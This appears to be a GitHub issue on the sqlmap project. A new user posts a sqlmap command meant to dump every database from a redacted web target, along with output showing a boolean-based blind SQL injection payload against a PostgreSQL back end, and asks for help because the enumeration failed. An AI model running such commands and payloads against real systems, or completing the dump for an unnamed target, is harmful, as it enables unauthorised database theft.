-
-
Notifications
You must be signed in to change notification settings - Fork 6.1k
Description
I am a new user of SQLMap. I tried with a command as below:
sqlmap.py -u "[REDACTED]" --dbms=PostgreSQL --random-agent --dump-all --no-cast
And result is as below:
Parameter: ProductCode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GameId=0&ProductCode=GD) AND 2031=2031 AND (9783=9783
[11:30:41] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: PostgreSQL
[11:30:41] [INFO] sqlmap will dump entries of all tables from all databases now
[11:30:41] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterp
art to database names on other DBMSes
[11:30:41] [INFO] fetching database (schema) names
[11:30:41] [INFO] fetching number of databases
[11:30:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[11:30:41] [INFO] retrieved:
[11:30:41] [WARNING] reflective value(s) found and filtering out
[11:30:42] [ERROR] unable to retrieve the number of databases
[11:30:42] [INFO] falling back to current database
[11:30:42] [INFO] fetching current database
[11:30:42] [INFO] retrieved:
[11:30:42] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[11:30:42] [CRITICAL] unable to retrieve the database names
Actually I want to retrieve the data from database but there is nothing. Anyone can try and support me?
Regards.